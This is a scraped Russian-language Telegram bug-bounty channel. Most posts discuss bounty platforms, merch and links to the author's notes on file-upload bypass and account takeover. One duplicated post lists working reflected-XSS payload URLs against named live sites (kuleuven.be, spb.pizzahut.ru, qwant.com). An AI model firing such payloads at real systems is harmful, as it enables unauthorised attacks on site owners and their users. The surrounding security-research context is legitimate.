ScriptKiddieNotes
Сегодня, по странному стечению обстоятельств, день XSS. Мой дружаня закидал меня вопросами по XSS, поэтому предлагаю вам челлендж в боевых условиях. От легкого к сложному. 1. https://www.kuleuven.be/communicatie/php/toga/?lang= Параметр lang уязвим. 2. …
This media is not supported in your browser
VIEW IN TELEGRAM
Ну поскольку всем похуй, вот такие ответы, в моем понимании, на предыдущий пост.
1. https://www.kuleuven.be/communicatie/php/toga/?lang=1</Script/><Svg/OnLoad=(confirm)(document.domain)>
2. https://spb.pizzahut.ru/?coupon[]='-alert(1)-'
3. https://www.qwant.com/?r=FR&sr=fr&l=fr_</script><script>myObj.prop =''-alert(document.domain);var myObj='';</script>
Hint:
Домен qwant.com вроде есть на yeswehack до сих пор, так что можете срубить за XSS баксов 500$. Лично я попытался там вывести денюжки по другим репортам, но уткнулся в сложности. Поэтому даже репортить не стал.
Ну и пусть нахуй идут.
#bb
1. https://www.kuleuven.be/communicatie/php/toga/?lang=1</Script/><Svg/OnLoad=(confirm)(document.domain)>
2. https://spb.pizzahut.ru/?coupon[]='-alert(1)-'
3. https://www.qwant.com/?r=FR&sr=fr&l=fr_</script><script>myObj.prop =''-alert(document.domain);var myObj='';</script>
Hint:
Домен qwant.com вроде есть на yeswehack до сих пор, так что можете срубить за XSS баксов 500$. Лично я попытался там вывести денюжки по другим репортам, но уткнулся в сложности. Поэтому даже репортить не стал.
Ну и пусть нахуй идут.
#bb
😁5👍1
This media is not supported in your browser
VIEW IN TELEGRAM
Мои личные заметки по обходу форм загрузок c подборкой полезныx материалов.
https://raw.githubusercontent.com/lalkaltest/FU/main/README.md
#bb
https://raw.githubusercontent.com/lalkaltest/FU/main/README.md
#bb
Я не понимаю. Зачем они закидывают инвайтами, если все равно не платят. Это такой толстый троллинг?
#bb
#bb
💩3🌚1
https://github.com/lalkaltest/ATO/blob/main/README.md
Мои личные заметки по Account Takeover + частично Rate limit Bypass.
В принципе, полезно, сам частенько заглядываю туда.
Ну и да, лучше тупой карандаш, чем острая память.
#bb
Мои личные заметки по Account Takeover + частично Rate limit Bypass.
В принципе, полезно, сам частенько заглядываю туда.
Ну и да, лучше тупой карандаш, чем острая память.
#bb
🔥3👍1
Стараюсь переориентироваться под новые условия.
Адаптируйся или умри, так, кажется, говорится.
Да, маловато, но щито поделать.
Пожелаем парням удачи.
https://bugbounty.standoff365.com/
https://bugbounty.ru/
https://bi.zone/ (Пока еще вроде не открылись)
Дропнул h1 и bc - обходить их анальные ограничения, скорее всего ненавидеть себя. Пусть они гонятся за вашим временем и знаниями, чем вы за их деньгами. Уважайте себя.
Разве что еще g/vrp остался. Тут платят, инфа 100%
#bb
Адаптируйся или умри, так, кажется, говорится.
Да, маловато, но щито поделать.
Пожелаем парням удачи.
https://bugbounty.standoff365.com/
https://bugbounty.ru/
https://bi.zone/ (Пока еще вроде не открылись)
Дропнул h1 и bc - обходить их анальные ограничения, скорее всего ненавидеть себя. Пусть они гонятся за вашим временем и знаниями, чем вы за их деньгами. Уважайте себя.
Разве что еще g/vrp остался. Тут платят, инфа 100%
#bb
👍8
https://t.me/standoff_365/16
Прослоупочил выкат ВКшечкой своей бб на bugbounty.standoff365.com
Ололо, набигаем, посоны.
#bb
Прослоупочил выкат ВКшечкой своей бб на bugbounty.standoff365.com
Ололо, набигаем, посоны.
#bb
👎1🔥1
Наглядный чек-лист для проверки форм загрузок.
Тоже сохранил для себя.
Плюс https://book.hacktricks.xyz/pentesting-web/file-upload
#bb
Тоже сохранил для себя.
Плюс https://book.hacktricks.xyz/pentesting-web/file-upload
#bb
👍6
Парни с bugbounty.ru прислали сет "script kiddie".
После примерки получил +10 хакенга и +5 удачи к статам.
Спасибо :3
#bb
После примерки получил +10 хакенга и +5 удачи к статам.
Спасибо :3
#bb
👍4🔥3
This media is not supported in your browser
VIEW IN TELEGRAM
Упрямство - лучший перк, который я получил, занимаясь багбаунти.
Помогает, когда ты не особо умный и скиловый. Как я.
Такие дела.
#bb #anime
Помогает, когда ты не особо умный и скиловый. Как я.
Такие дела.
#bb #anime
🔥4
Заметил, что в других чатах по бб посоны часто ищут и спрашивают альтернативы H1, BC и так далее. Даже, во всяких Индиях и прочее.
Нашел пикчу, разбирая завал старых файлов. Может, кому-то поможет(тыкнул рандомно пару доменов, вроде даже живые).
Так же прикрепляю в комментарии к посту свой список спарсенных из гугла потенциальных бб, более-менее очищенный от мусора. Даже над чем-то из него успел поработать немного.
#bb
Нашел пикчу, разбирая завал старых файлов. Может, кому-то поможет(тыкнул рандомно пару доменов, вроде даже живые).
Так же прикрепляю в комментарии к посту свой список спарсенных из гугла потенциальных бб, более-менее очищенный от мусора. Даже над чем-то из него успел поработать немного.
#bb
👍1👎1🔥1
Заметил, что на standoff365.com посоны за неделю нахуярили почти 90 репортов.
Это что же получается, импортозамещение встает скален, или там не только веб-багбаунти считается?
#bb
Это что же получается, импортозамещение встает скален, или там не только веб-багбаунти считается?
#bb
Когда-то я коллекционировал денежные знаки.
Сейчас - футболки.
Такие дела.
Не подскажите, как c https://bi.zone/ срубить футболочку, благо они открываются для вебщиков через пару дней?
#bb
Сейчас - футболки.
Такие дела.
Не подскажите, как c https://bi.zone/ срубить футболочку, благо они открываются для вебщиков через пару дней?
#bb
👎1🏆1